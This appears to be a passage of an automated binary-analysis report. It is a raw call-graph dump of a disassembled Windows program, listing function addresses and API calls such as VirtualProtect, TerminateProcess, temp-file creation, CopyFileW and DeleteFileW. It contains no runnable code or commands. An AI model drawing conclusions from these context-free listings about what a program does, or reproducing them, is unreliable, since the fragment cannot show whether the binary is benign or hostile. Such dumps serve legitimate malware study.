97065->97289 97293 a2d4ce 97065->97293 97296 a4958b 97065->97296 97299 a3f0ec 97065->97299 97319 a3359c 82 API calls __wsopen_s 97065->97319 97066->97065 97072 9ca8c7 22 API calls 97066->97072 97067->97059 97308 9dce17 22 API calls ISource 97067->97308 97068->97065 97317 a3359c 82 API calls __wsopen_s 97069->97317 97072->97065 97081 9dee09 97080->97081 97082 9dee12 97080->97082 97081->96977 97082->97081 97083 9dee36 IsDialogMessageW 97082->97083 97084 a1efaf GetClassLongW 97082->97084 97083->97081 97083->97082 97084->97082 97084->97083 98190 9cadf0 97085->98190 97087 9cbf9d 97088 9cbfa9 97087->97088 97089 a104b6 97087->97089 97091 9cc01e 97088->97091 97092 a104c6 97088->97092 98209 a3359c 82 API calls __wsopen_s 97089->98209 98195 9cac91 97091->98195 98210 a3359c 82 API calls __wsopen_s 97092->98210 97095 a104f5 97110 a1055a 97095->97110 98211 9dd217 235 API calls 97095->98211 97096 a27120 22 API calls 97099 9cc039 ISource __fread_nolock 97096->97099 97097 9cc7da 97102 9dfe0b 22 API calls 97097->97102 97099->97095 97099->97096 97099->97097 97106 9cec40 235 API calls 97099->97106 97107 9cc808 __fread_nolock 97099->97107 97108 9caf8a 22 API calls 97099->97108 97109 a1091a 97099->97109 97099->97110 97114 a108a5 97099->97114 97118 a10591 97099->97118 97121 a108f6 97099->97121 97124 9cbbe0 40 API calls 97099->97124 97126 9cc237 97099->97126 97129 9cc603 97099->97129 97131 9dfddb 22 API calls 97099->97131 97136 a109bf 97099->97136 97141 9dfe0b 22 API calls 97099->97141 98199 9cad81 97099->98199 98214 a27099 22 API calls __fread_nolock 97099->98214 98215 a45745 54 API calls _wcslen 97099->98215 98216 9daa42 22 API calls ISource 97099->98216 98217 a2f05c 40 API calls 97099->98217 98218 9ca993 41 API calls 97099->98218 98219 9caceb 23 API calls ISource 97099->98219 97102->97107 97106->97099 97111 9dfe0b 22 API calls 97107->97111 97108->97099 98222 a33209 23 API calls 97109->98222 97110->97129 98212 a3359c 82 API calls __wsopen_s 97110->98212 97140 9cc350 ISource __fread_nolock 97111->97140 97115 9cec40 235 API calls 97114->97115 97117 a108cf 97115->97117 97117->97129 98220 9ca81b 41 API calls 97117->98220 98213 a3359c 82 API calls __wsopen_s 97118->98213 98221 a3359c 82 API calls __wsopen_s 97121->98221 97124->97099 97127 9cc253 97126->97127 97128 9ca8c7 22 API calls 97126->97128 97130 a10976 97127->97130 97134 9cc297 ISource 97127->97134 97128->97127 97129->96977 98223 9caceb 23 API calls ISource 97130->98223 97131->97099 97134->97136 98206 9caceb 23 API calls ISource 97134->98206 97136->97129 98224 a3359c 82 API calls __wsopen_s 97136->98224 97137 9cc335 97137->97136 97138 9cc342 97137->97138 98207 9ca704 22 API calls ISource 97138->98207 97142 9cc3ac 97140->97142 98208 9dce17 22 API calls ISource 97140->98208 97141->97099 97142->96977 97143->96977 97144->96977 97146 9cec76 ISource 97145->97146 97147 9e0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97146->97147 97148 9e01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97146->97148 97150 9cfef7 97146->97150 97151 9dfddb 22 API calls 97146->97151 97153 a14b0b 97146->97153 97154 9ca8c7 22 API calls 97146->97154 97155 a14600 97146->97155 97161 9cfbe3 97146->97161 97162 9ca961 22 API calls 97146->97162 97163 9ced9d ISource 97146->97163 97165 9e00a3 29 API calls pre_c_initialization 97146->97165 97167 a14beb 97146->97167 97168 9cf3ae ISource 97146->97168 98233 9d01e0 235 API calls 2 library calls 97146->98233 98234 9d06a0 41 API calls ISource 97146->98234 97147->97146 97148->97146 97158 9ca8c7 22 API calls 97150->97158 97150->97163 97151->97146 98236 a3359c 82 API calls __wsopen_s 97153->98236 97154->97146 97159 9ca8c7 22 API calls 97155->97159 97155->97163 97158->97163 97159->97163 97161->97163 97164 a14bdc 97161->97164 97161->97168 97162->97146 97163->96977 98237 a3359c 82 API calls __wsopen_s 97164->98237 97165->97146 98238 a3359c 82 API calls __wsopen_s 97167->98238 97168->97163 98235 a3359c 82 API calls __wsopen_s 97168->98235 97169->96977 97170->96984 97171->96984 97172->96984 97173->96998 97174->97000 97175->97018 97176->97018 97177->97005 97179 9dfe0b 22 API calls 97178->97179 97180 9ca976 97179->97180 97181 9dfddb 22 API calls 97180->97181 97182 9ca984 97181->97182 97183 9e00a3 29 API calls __onexit 97182->97183 97183->97013 97184->97018 97185->97018 97186->97018 97187->97018 97188->97018 97189->97018 97191 9d195d 97190->97191 97192 9d1981 97190->97192 97199 9d13a0 97191->97199 97322 9e0242 5 API calls __Init_thread_wait 97191->97322 97320 9e0242 5 API calls __Init_thread_wait 97192->97320 97195 9d198b 97195->97191 97321 9e01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97195->97321 97196 9d8727 97196->97199 97323 9e01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97196->97323 97199->97036 97324 a47f59 97200->97324 97202 a495af 97202->97065 97204 9ca961 22 API calls 97203->97204 97205 a36f1d 97204->97205 97206 9ca961 22 API calls 97205->97206 97207 a36f26 97206->97207 97208 a36f3a 97207->97208 97616 9cb567 39 API calls 97207->97616 97210 9c7510 53 API calls 97208->97210 97217 a36f57 _wcslen 97210->97217 97211 a370bf 97440 9c4ecb 97211->97440 97212 a36fbc 97213 9c7510 53 API calls 97212->97213 97215 a36fc8 97213->97215 97220 9ca8c7 22 API calls 97215->97220 97226 a36fdb 97215->97226 97217->97211 97217->97212 97223 a370e9 97217->97223 97218 a370e5 97219 9ca961 22 API calls 97218->97219 97218->97223 97222 a3711a 97219->97222 97220->97226 97221 9c4ecb 94 API calls 97221->97218 97224 9ca961 22 API calls 97222->97224 97223->97065 97228 a37126 97224->97228 97225 a37027 97227 9c7510 53 API calls 97225->97227 97226->97225 97229 a37005 97226->97229 97232 9ca8c7 22 API calls 97226->97232 97230 a37034 97227->97230 97231 9ca961 22 API calls 97228->97231 97617 9c33c6 97229->97617 97234 a37047 97230->97234 97235 a3703d 97230->97235 97236 a3712f 97231->97236 97232->97229 97626 a2e199 GetFileAttributesW 97234->97626 97239 9ca8c7 22 API calls 97235->97239 97241 9ca961 22 API calls 97236->97241 97237 a3700f 97238 9c7510 53 API calls 97237->97238 97242 a3701b 97238->97242 97239->97234 97244 a37138 97241->97244 97245 9c6350 22 API calls 97242->97245 97243 a37050 97246 a37063 97243->97246 97249 9c4c6d 22 API calls 97243->97249 97247 9c7510 53 API calls 97244->97247 97245->97225 97248 9c7510 53 API calls 97246->97248 97256 a37069 97246->97256 97250 a37145 97247->97250 97251 a370a0 97248->97251 97249->97246 97462 9c525f 97250->97462 97627 a2d076 57 API calls 97251->97627 97254 a37166 97504 9c4c6d 97254->97504 97256->97223 97258 a371a9 97260 9ca8c7 22 API calls 97258->97260 97259 9c4c6d 22 API calls 97261 a37186 97259->97261 97262 a371ba 97260->97262 97261->97258 97628 9c6b57 97261->97628 97263 9c6350 22 API calls 97262->97263 97265 a371c8 97263->97265 97267 9c6350 22 API calls 97265->97267 97266 a3719b 97268 9c6b57 22 API calls 97266->97268 97269 a371d6 97267->97269 97268->97258 97270 9c6350 22 API calls 97269->97270 97271 a371e4 97270->97271 97272 9c7510 53 API calls 97271->97272 97273 a371f0 97272->97273 97507 a2d7bc 97273->97507 97275 a37201 97276 a2d4ce 4 API calls 97275->97276 97277 a3720b 97276->97277 97278 a37239 97277->97278 97279 9c7510 53 API calls 97277->97279 97282 9c4f39 68 API calls 97278->97282 97280 a37229 97279->97280 97561 a32947 97280->97561 97282->97223 97284 9c4f4a 97283->97284 97285 9c4f43 97283->97285 97287 9c4f59 97284->97287 97288 9c4f6a FreeLibrary 97284->97288 97286 9ee678 67 API calls 97285->97286 97286->97284 97287->97065 97288->97287 97290 a31ea4 97289->97290 97291 a31e9f 97289->97291 97290->97065 98121 a30f67 97291->98121 98142 a2dbbe lstrlenW 97293->98142 97297 a47f59 120 API calls 97296->97297 97298 a4959b 97297->97298 97298->97065 97300 9c7510 53 API calls 97299->97300 97301 a3f126 97300->97301 98147 9c9e90 97301->98147 97303 a3f136 97304 a3f15b 97303->97304 97305 9cec40 235 API calls 97303->97305 97307 a3f15f 97304->97307 98175 9c9c6e 22 API calls 97304->98175 97305->97304 97307->97065 97308->97067 97309->97032 97310->97035 97311->97044 97312->97058 97313->97058 97314->97030 97315->97065 97316->97065 97317->97065 97318->97066 97319->97065 97320->97195 97321->97191 97322->97196 97323->97199 97325 9c7510 53 API calls 97324->97325 97326 a47f90 97325->97326 97338 a47fd5 ISource 97326->97338 97362 a48cd3 97326->97362 97328 a4844f 97403 a48ee4 60 API calls 97328->97403 97331 a4845e 97333 a4828f 97331->97333 97334 a4846a 97331->97334 97332 a48049 97335 9c7510 53 API calls 97332->97335 97332->97338 97350 a48281 97332->97350 97394 a2417d 22 API calls __fread_nolock 97332->97394 97395 a4851d 42 API calls _strftime 97332->97395 97375 a47e86 97333->97375 97334->97338 97335->97332 97338->97202 97341 a482c8 97390 9dfc70 97341->97390 97344 a48302 97397 9c63eb 22 API calls 97344->97397 97345 a482e8 97396 a3359c 82 API calls __wsopen_s 97345->97396 97348 a482f3 GetCurrentProcess TerminateProcess 97348->97344 97349 a48311 97398 9c6a50 22 API calls 97349->97398 97350->97328 97350->97333 97352 a4832a 97361 a48352 97352->97361 97399 9d04f0 22 API calls 97352->97399 97354 a484c5 97354->97338 97356 a484d9 FreeLibrary 97354->97356 97355 a48341 97400 a48b7b 75 API calls 97355->97400 97356->97338 97361->97354 97401 9d04f0 22 API calls 97361->97401 97402 9caceb 23 API calls ISource 97361->97402 97404 a48b7b 75 API calls 97361->97404 97405 9caec9 97362->97405 97364 a48cee CharLowerBuffW 97411 a28e54 97364->97411 97368 9ca961 22 API calls 97369 a48d2a 97368->97369 97418 9c6d25 97369->97418 97371 a48d3e 97431 9c93b2 97371->97431 97373 a48e5e _wcslen 97373->97332 97374 a48d48 _wcslen 97374->97373 97435 a4851d 42 API calls _strftime 97374->97435 97376 a47ea1 97375->97376 97380 a47eec 97375->97380 97377 9dfe0b 22 API calls 97376->97377 97378 a47ec3 97377->97378 97379 9dfddb 22 API calls 97378->97379 97378->97380 97379->97378 97381 a49096 97380->97381 97382 a492ab ISource 97381->97382 97389 a490ba _strcat _wcslen 97381->97389 97382->97341 97383 9cb38f 39 API calls 97383->97389 97384 9cb567 39 API calls 97384->97389 97385 9cb6b5 39 API calls 97385->97389 97386 9c7510 53 API calls 97386->97389 97387 9eea0c 21 API calls ___std_exception_copy 97387->97389 97389->97382 97389->97383 97389->97384 97389->97385 97389->97386 97389->97387 97439 a2efae 24 API calls _wcslen 97389->97439 97391 9dfc85 97390->97391 97392 9dfd1d VirtualProtect 97391->97392 97393 9dfceb 97391->97393 97392->97393 97393->97344 97393->97345 97394->97332 97395->97332 97396->97348 97397->97349 97398->97352 97399->97355 97400->97361 97401->97361 97402->97361 97403->97331 97404->97361 97406 9caedc 97405->97406 97410 9caed9 __fread_nolock 97405->97410 97407 9dfddb 22 API calls 97406->97407 97408 9caee7 97407->97408 97409 9dfe0b 22 API calls 97408->97409 97409->97410 97410->97364 97413 a28e74 _wcslen 97411->97413 97412 a28f63 97412->97368 97412->97374 97413->97412 97414 a28ea9 97413->97414 97415 a28f68 97413->97415 97414->97412 97436 9dce60 41 API calls 97414->97436 97415->97412 97437 9dce60 41 API calls 97415->97437 97419 9c6d34 97418->97419 97420 9c6d91 97418->97420 97419->97420 97422 9c6d3f 97419->97422 97421 9c93b2 22 API calls 97420->97421 97428 9c6d62 __fread_nolock 97421->97428 97423 9c6d5a 97422->97423 97424 a04c9d 97422->97424 97438 9c6f34 22 API calls 97423->97438 97426 9dfddb 22 API calls 97424->97426 97427 a04ca7 97426->97427 97429 9dfe0b 22 API calls 97427->97429 97428->97371 97430 a04cda 97429->97430 97432 9c93c9 __fread_nolock 97431->97432 97433 9c93c0 97431->97433 97432->97374 97433->97432 97434 9caec9 22 API calls 97433->97434 97434->97432 97435->97373 97436->97414 97437->97415 97438->97428 97439->97389 97640 9c4e90 LoadLibraryA 97440->97640 97445 9c4ef6 LoadLibraryExW 97648 9c4e59 LoadLibraryA 97445->97648 97446 a03ccf 97448 9c4f39 68 API calls 97446->97448 97450 a03cd6 97448->97450 97452 9c4e59 3 API calls 97450->97452 97454 a03cde 97452->97454 97453 9c4f20 97453->97454 97455 9c4f2c 97453->97455 97670 9c50f5 97454->97670 97457 9c4f39 68 API calls 97455->97457 97459 9c4f31 97457->97459 97459->97218 97459->97221 97461 a03d05 97463 9ca961 22 API calls 97462->97463 97464 9c5275 97463->97464 97465 9ca961 22 API calls 97464->97465 97466 9c527d 97465->97466 97467 9ca961 22 API calls 97466->97467 97468 9c5285 97467->97468 97469 9ca961 22 API calls 97468->97469 97470 9c528d 97469->97470 97471 a03df5 97470->97471 97472 9c52c1 97470->97472 97474 9ca8c7 22 API calls 97471->97474 97473 9c6d25 22 API calls 97472->97473 97475 9c52cf 97473->97475 97476 a03dfe 97474->97476 97477 9c93b2 22 API calls 97475->97477 97813 9ca6c3 97476->97813 97479 9c52d9 97477->97479 97480 9c5304 97479->97480 97481 9c6d25 22 API calls 97479->97481 97482 9c5349 97480->97482 97483 9c5325 97480->97483 97500 a03e20 97480->97500 97485 9c52fa 97481->97485 97484 9c6d25 22 API calls 97482->97484 97483->97482 97488 9c4c6d 22 API calls 97483->97488 97486 9c535a 97484->97486 97487 9c93b2 22 API calls 97485->97487 97489 9c5370 97486->97489 97494 9ca8c7 22 API calls 97486->97494 97487->97480 97490 9c5332 97488->97490 97492 9c5384 97489->97492 97496 9ca8c7 22 API calls 97489->97496 97490->97482 97495 9c6d25 22 API calls 97490->97495 97491 9c6b57 22 API calls 97501 a03ee0 97491->97501 97493 9c538f 97492->97493 97497 9ca8c7 22 API calls 97492->97497 97498 9ca8c7 22 API calls 97493->97498 97502 9c539a 97493->97502 97494->97489 97495->97482 97496->97492 97497->97493 97498->97502 97499 9c4c6d 22 API calls 97499->97501 97500->97491 97501->97482 97501->97499 97819 9c49bd 22 API calls __fread_nolock 97501->97819 97502->97254 97505 9caec9 22 API calls 97504->97505 97506 9c4c78 97505->97506 97506->97258 97506->97259 97508 a2d7d8 97507->97508 97509 a2d7f3 97508->97509 97510 a2d7dd 97508->97510 97511 9ca961 22 API calls 97509->97511 97513 9ca8c7 22 API calls 97510->97513 97560 a2d7ee 97510->97560 97512 a2d7fb 97511->97512 97514 9ca961 22 API calls 97512->97514 97513->97560 97515 a2d803 97514->97515 97516 9ca961 22 API calls 97515->97516 97517 a2d80e 97516->97517 97518 9ca961 22 API calls 97517->97518 97519 a2d816 97518->97519 97520 9ca961 22 API calls 97519->97520 97521 a2d81e 97520->97521 97522 9ca961 22 API calls 97521->97522 97523 a2d826 97522->97523 97524 9ca961 22 API calls 97523->97524 97525 a2d82e 97524->97525 97526 9ca961 22 API calls 97525->97526 97527 a2d836 97526->97527 97528 9c525f 22 API calls 97527->97528 97529 a2d84d 97528->97529 97530 9c525f 22 API calls 97529->97530 97531 a2d866 97530->97531 97532 9c4c6d 22 API calls 97531->97532 97533 a2d872 97532->97533 97534 a2d885 97533->97534 97535 9c93b2 22 API calls 97533->97535 97536 9c4c6d 22 API calls 97534->97536 97535->97534 97537 a2d88e 97536->97537 97538 a2d89e 97537->97538 97539 9c93b2 22 API calls 97537->97539 97540 a2d8b0 97538->97540 97542 9ca8c7 22 API calls 97538->97542 97539->97538 97541 9c6350 22 API calls 97540->97541 97543 a2d8bb 97541->97543 97542->97540 97820 a2d978 22 API calls 97543->97820 97545 a2d8ca 97821 a2d978 22 API calls 97545->97821 97547 a2d8dd 97548 9c4c6d 22 API calls 97547->97548 97549 a2d8e7 97548->97549 97550 a2d8fe 97549->97550 97551 a2d8ec 97549->97551 97553 9c4c6d 22 API calls 97550->97553 97552 9c33c6 22 API calls 97551->97552 97554 a2d8f9 97552->97554 97555 a2d907 97553->97555 97558 9c6350 22 API calls 97554->97558 97556 a2d925 97555->97556 97557 9c33c6 22 API calls 97555->97557 97559 9c6350 22 API calls 97556->97559 97557->97554 97558->97556 97559->97560 97560->97275 97562 a32954 __wsopen_s 97561->97562 97563 9dfe0b 22 API calls 97562->97563 97564 a32971 97563->97564 97565 9c5722 22 API calls 97564->97565 97566 a3297b 97565->97566 97567 a3274e 27 API calls 97566->97567 97568 a32986 97567->97568 97569 9c511f 64 API calls 97568->97569 97570 a3299b 97569->97570 97571 a329bf 97570->97571 97572 a32a6c 97570->97572 97848 a32e66 97571->97848 97574 a32e66 75 API calls 97572->97574 97589 a32a38 97574->97589 97577 9c50f5 40 API calls 97578 a32a91 97577->97578 97579 9c50f5 40 API calls 97578->97579 97582 a32aa1 97579->97582 97580 a32a75 ISource 97580->97278 97581 a329ed 97855 9ed583 26 API calls 97581->97855 97583 9c50f5 40 API calls 97582->97583 97585 a32abc 97583->97585 97586 9c50f5 40 API calls 97585->97586 97587 a32acc 97586->97587 97588 9c50f5 40 API calls 97587->97588 97590 a32ae7 97588->97590 97589->97577 97589->97580 97591 9c50f5 40 API calls 97590->97591 97592 a32af7 97591->97592 97593 9c50f5 40 API calls 97592->97593 97594 a32b07 97593->97594 97595 9c50f5 40 API calls 97594->97595 97596 a32b17 97595->97596 97822 a33017 GetTempPathW GetTempFileNameW 97596->97822 97598 a32b22 97599 9ee5eb 29 API calls 97598->97599 97610 a32b33 97599->97610 97601 a32bf8 97603 a32c12 97601->97603 97604 a32bfe DeleteFileW 97601->97604 97602 9c50f5 40 API calls 97602->97610 97605 a32c91 CopyFileW 97603->97605 97606 a32c18 97603->97606 97604->97580 97607 a32ca7 DeleteFileW 97605->97607 97608 a32cb9 DeleteFileW 97605->97608 97856 a322ce 79 API calls 97606->97856 97607->97580 97845 a32fd8 CreateFileW 97608->97845 97610->97580 97610->97602 97612 a32bed 97610->97612 97823 9edbb3 97610->97823 97832 9ee678 97612->97832 97614 a32c7c 97614->97608 97615 a32c80 DeleteFileW 97614->97615 97615->97580 97616->97208 97618 9c33dd 97617->97618 97619 a030bb 97617->97619 98110 9c33ee 97618->98110 97621 9dfddb 22 API calls 97619->97621 97623 a030c5 _wcslen 97621->97623 97622 9c33e8 97622->97237 97624 9dfe0b 22 API calls 97623->97624 97625 a030fe __fread_nolock 97624->97625 97626->97243 97627->97256 97629 a04ba1 97628->97629 97630 9c6b67 _wcslen 97628->97630 97631 9c93b2 22 API calls 97629->97631 97633 9c6b7d 97630->97633 97634 9c6ba2 97630->97634 97632 a04baa 97631->97632 97632->97632 98120 9c6f34 22 API calls 97633->98120 97635 9dfddb 22 API calls 97634->97635 97637 9c6bae 97635->97637 97639 9dfe0b 22 API calls 97637->97639 97638 9c6b85 __fread_nolock 97638->97266 97639->97638 97641 9c4ea8 GetProcAddress 97640->97641 97642 9c4ec6 97640->97642 97643 9c4eb8 97641->97643 97645 9ee5eb 97642->97645 97643->97642 97644 9c4ebf FreeLibrary 97643->97644 97644->97642 97678 9ee52a 97645->97678 97647 9c4eea 97647->97445 97647->97446 97649 9c4e8d 97648->97649 97650 9c4e6e GetProcAddress 97648->97650 97653 9c4f80 97649->97653 97651 9c4e7e 97650->97651 97651->97649 97652 9c4e86 FreeLibrary 97651->97652 97652->97649 97654 9dfe0b 22 API calls 97653->97654 97655 9c4f95 97654->97655 97739 9c5722 97655->97739 97657 9c4fa1 __fread_nolock 97658 9c50a5 97657->97658 97659 a03d1d 97657->97659 97668 9c4fdc 97657->97668 97742 9c42a2 CreateStreamOnHGlobal 97658->97742 97753 a3304d 74 API calls 97659->97753 97662 a03d22 97664 9c511f 64 API calls 97662->97664 97663 9c50f5 40 API calls 97663->97668 97665 a03d45 97664->97665 97666 9c50f5 40 API calls 97665->97666 97669 9c506e ISource 97666->97669 97668->97662 97668->97663 97668->97669 97748 9c511f 97668->97748 97669->97453 97671 a03d70 97670->97671 97672 9c5107 97670->97672 97775 9ee8c4 97672->97775 97675 a328fe 97796 a3274e 97675->97796 97677 a32919 97677->97461 97681 9ee536 ___BuildCatchObject 97678->97681 97679 9ee544 97703 9ef2d9 20 API calls _abort 97679->97703 97681->97679 97683 9ee574 97681->97683 97682 9ee549 97704 9f27ec 26 API calls _abort 97682->97704 97685 9ee579 97683->97685 97686 9ee586 97683->97686 97705 9ef2d9 20 API calls _abort 97685->97705 97695 9f8061 97686->97695 97689 9ee58f 97690 9ee595 97689->97690 97691 9ee5a2 97689->97691 97706 9ef2d9 20 API calls _abort 97690->97706 97707 9ee5d4 LeaveCriticalSection __fread_nolock 97691->97707 97693 9ee554 __fread_nolock 97693->97647 97696 9f806d ___BuildCatchObject 97695->97696 97708 9f2f5e EnterCriticalSection 97696->97708 97698 9f807b 97709 9f80fb 97698->97709 97702 9f80ac __fread_nolock 97702->97689 97703->97682 97704->97693 97705->97693 97706->97693 97707->97693 97708->97698 97716 9f811e 97709->97716 97710 9f8177 97728 9f4c7d 20 API calls 2 library calls 97710->97728 97712 9f8180 97729 9f29c8 97712->97729 97715 9f8189 97717 9f8088 97715->97717 97735 9f3405 11 API calls 2 library calls 97715->97735 97716->97710 97716->97717 97726 9e918d EnterCriticalSection 97716->97726 97727 9e91a1 LeaveCriticalSection 97716->97727 97723 9f80b7 97717->97723 97719 9f81a8 97736 9e918d EnterCriticalSection 97719->97736 97722 9f81bb 97722->97717 97738 9f2fa6 LeaveCriticalSection 97723->97738 97725 9f80be 97725->97702 97726->97716 97727->97716 97728->97712 97730 9f29d3 RtlFreeHeap 97729->97730 97731 9f29fc __dosmaperr 97729->97731 97730->97731 97732 9f29e8 97730->97732 97731->97715 97737 9ef2d9 20 API calls _abort 97732->97737 97734 9f29ee GetLastError 97734->97731 97735->97719 97736->97722 97737->97734 97738->97725 97740 9dfddb 22 API calls 97739->97740 97741 9c5734 97740->97741 97741->97657 97743 9c42bc FindResourceExW 97742->97743 97747 9c42d9 97742->97747 97744 a035ba LoadResource 97743->97744 97743->97747 97745 a035cf SizeofResource 97744->97745 97744->97747 97746 a035e3 LockResource 97745->97746 97745->97747 97746->97747 97747->97668 97749 a03d90 97748->97749 97750 9c512e 97748->97750 97754 9eece3 97750->97754 97753->97662 97757 9eeaaa 97754->97757 97756 9c513c 97756->97668 97760 9eeab6 ___BuildCatchObject 97757->97760 97758 9eeac2 97770 9ef2d9 20 API calls _abort 97758->97770 97760->97758 97761 9eeae8 97760->97761 97772 9e918d EnterCriticalSection 97761->97772 97762 9eeac7 97771 9f27ec 26 API calls _abort 97762->97771 97765 9eeaf4 97773 9eec0a 62 API calls 2 library calls 97765->97773 97767 9eeb08 97774 9eeb27 LeaveCriticalSection __fread_nolock 97767->97774 97769 9eead2 __fread_nolock 97769->97756 97770->97762 97771->97769 97772->97765 97773->97767 97774->97769 97778 9ee8e1 97775->97778 97777 9c5118 97777->97675 97779 9ee8ed ___BuildCatchObject 97778->97779 97780 9ee92d 97779->97780 97781 9ee900 ___scrt_fastfail 97779->97781 97782 9ee925 __fread_nolock 97779->97782 97793 9e918d EnterCriticalSection 97780->97793 97791 9ef2d9 20 API calls _abort 97781->97791 97782->97777 97784 9ee937 97794 9ee6f8 38 API calls 4 library calls 97784->97794 97787 9ee91a 97792 9f27ec 26 API calls _abort 97787->97792 97788 9ee94e 97795 9ee96c LeaveCriticalSection __fread_nolock 97788->97795 97791->97787 97792->97782 97793->97784 97794->97788 97795->97782 97799 9ee4e8 97796->97799 97798 a3275d 97798->97677 97802 9ee469 97799->97802 97801 9ee505 97801->97798 97803 9ee478 97802->97803 97805 9ee48c 97802->97805 97810 9ef2d9 20 API calls _abort 97803->97810 97809 9ee488 __alldvrm 97805->97809 97812 9f333f 11 API calls 2 library calls 97805->97812 97806 9ee47d 97811 9f27ec 26 API calls _abort 97806->97811 97809->97801 97810->97806 97811->97809 97812->97809 97814 9ca6dd 97813->97814 97815 9ca6d0 97813->97815 97816 9dfddb 22 API calls 97814->97816 97815->97480 97817 9ca6e7 97816->97817 97818 9dfe0b 22 API calls 97817->97818 97818->97815 97819->97501 97820->97545 97821->97547 97822->97598 97824 9edbc1 97823->97824 97830 9edbdd 97823->97830 97825 9edbcd 97824->97825 97826 9edbe3 97824->97826 97824->97830 97860 9ef2d9 20 API calls _abort 97825->97860 97857 9ed9cc 97826->97857 97829 9edbd2 97861 9f27ec 26 API calls _abort 97829->97861 97830->97610 97833 9ee684 ___BuildCatchObject 97832->97833 97834 9ee6aa 97833->97834 97835 9ee695 97833->97835 97844 9ee6a5 __fread_nolock 97834->97844 98017 9e918d EnterCriticalSection 97834->98017 98034 9ef2d9 20 API calls _abort 97835->98034 97838 9ee69a 98035 9f27ec 26 API calls _abort 97838->98035 97839 9ee6c6 98018 9ee602 97839->98018 97842 9ee6d1 98036 9ee6ee LeaveCriticalSection __fread_nolock 97842->98036 97844->97601 97846 a33013 97845->97846 97847 a32fff SetFileTime CloseHandle 97845->97847 97846->97580 97847->97846 97849 a32e7a 97848->97849 97850 9c50f5 40 API calls 97849->97850 97851 a329c4 97849->97851 97852 a328fe 27 API calls 97849->97852 97853 9c511f 64 API calls 97849->97853 97850->97849 97851->97580 97854 9ed583 26 API calls 97851->97854 97852->97849 97853->97849 97854->97581 97855->97589 97856->97614 97862 9ed97b 97857->97862 97859 9ed9f0 97859->97830 97860->97829 97861->97830 97863 9ed987 ___BuildCatchObject 97862->97863 97870 9e918d EnterCriticalSection 97863->97870 97865 9ed995 97871 9ed9f4 97865->97871 97869 9ed9b3 __fread_nolock 97869->97859 97870->97865 97879 9f49a1 97871->97879 97877 9ed9a2 97878 9ed9c0 LeaveCriticalSection __fread_nolock 97877->97878 97878->97869 97900 9ed955 97879->97900 97881 9f49b0 97907 9ff89b 97881->97907 97883 9f49b6 97884 9eda09 97883->97884 97916 9f3820 21 API calls 2 library calls 97883->97916 97888 9eda3a 97884->97888 97886 9f4a15 97887 9f29c8 _free 20 API calls 97886->97887 97887->97884 97889 9eda24 97888->97889 97891 9eda4c 97888->97891 97899 9f4a56 62 API calls 97889->97899 97890 9eda5a 97947 9ef2d9 20 API calls _abort 97890->97947 97891->97889 97891->97890 97897 9eda85 __fread_nolock 97891->97897 97893 9eda5f 97948 9f27ec 26 API calls _abort 97893->97948 97896 9ed955 __fread_nolock 26 API calls 97896->97897 97897->97889 97897->97896 97922 9f59be 97897->97922 97949 9edc0b 97897->97949 97899->97877 97901 9ed976 97900->97901 97902 9ed961 97900->97902 97901->97881 97917 9ef2d9 20 API calls _abort 97902->97917 97904 9ed966 97918 9f27ec 26 API calls _abort 97904->97918 97906 9ed971 97906->97881 97908 9ff8a8 97907->97908 97909 9ff8b5 97907->97909 97919 9ef2d9 20 API calls _abort 97908->97919 97912 9ff8c1 97909->97912 97920 9ef2d9 20 API calls _abort 97909->97920 97911 9ff8ad 97911->97883 97912->97883 97914 9ff8e2 97921 9f27ec 26 API calls _abort 97914->97921 97916->97886 97917->97904 97918->97906 97919->97911 97920->97914 97921->97911 97923 9f59ca ___BuildCatchObject 97922->97923 97924 9f59ea 97923->97924 97925 9f59d2 97923->97925 97926 9f5a88 97924->97926 97931 9f5a1f 97924->97931 98009 9ef2c6 20 API calls _abort 97925->98009 98014 9ef2c6 20 API calls _abort 97926->98014 97929 9f59d7 98010 9ef2d9 20 API calls _abort 97929->98010 97930 9f5a8d 98015 9ef2d9 20 API calls _abort 97930->98015 97955 9f5147 EnterCriticalSection 97931->97955 97935 9f5a95 98016 9f27ec 26 API calls _abort 97935->98016 97936 9f5a25 97938 9f5a56 97936->97938 97939 9f5a41 97936->97939 97956 9f5aa9 97938->97956 98011 9ef2d9 20 API calls _abort 97939->98011 97941 9f59df __fread_nolock 97941->97897 97943 9f5a46 98012 9ef2c6 20 API calls _abort 97943->98012 97944 9f5a51 98013 9f5a80 LeaveCriticalSection __wsopen_s 97944->98013 97947->97893 97948->97889 97950 9edc1f 97949->97950 97951 9edc23 97949->97951 97950->97897 97951->97950 97952 9ed955 __fread_nolock 26 API calls 97951->97952 97953 9edc43 97952->97953 97954 9f59be __wsopen_s 62 API calls 97953->97954 97954->97950 97955->97936 97957 9f5ad7 97956->97957 97994 9f5ad0 97956->97994 97958 9f5adb 97957->97958 97959 9f5afa 97957->97959 97960 9ef2c6 __dosmaperr 20 API calls 97958->97960 97963 9f5b4b 97959->97963 97964 9f5b2e 97959->97964 97962 9f5ae0 97960->97962 97961 9e0a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 97965 9f5cb1 97961->97965 97966 9ef2d9 __dosmaperr 20 API calls 97962->97966 97967 9f5b61 97963->97967 97970 9f9424 __wsopen_s 28 API calls 97963->97970 97968 9ef2c6 __dosmaperr 20 API calls 97964->97968 97965->97944 97969 9f5ae7 97966->97969 97971 9f564e __wsopen_s 39 API calls 97967->97971 97972 9f5b33 97968->97972 97973 9f27ec _abort 26 API calls 97969->97973 97970->97967 97974 9f5b6a 97971->97974 97975 9ef2d9 __dosmaperr 20 API calls 97972->97975 97973->97994 97977 9f5b6f 97974->97977 97978 9f5ba8 97974->97978 97976 9f5b3b 97975->97976 97979 9f27ec _abort 26 API calls 97976->97979 97982 9f5b95 97977->97982 97983 9f5b73 97977->97983 97980 9f5bbc 97978->97980 97981 9f5c02 WriteFile 97978->97981 97979->97994 97986 9f5bc4 97980->97986 97987 9f5bf2 97980->97987 97984 9f5c25 GetLastError 97981->97984 97989 9f5b8b 97981->97989 97985 9f542e __wsopen_s 45 API calls 97982->97985 97988 9f5c69 97983->97988 97992 9f55e1 __wsopen_s GetLastError WriteConsoleW CreateFileW 97983->97992 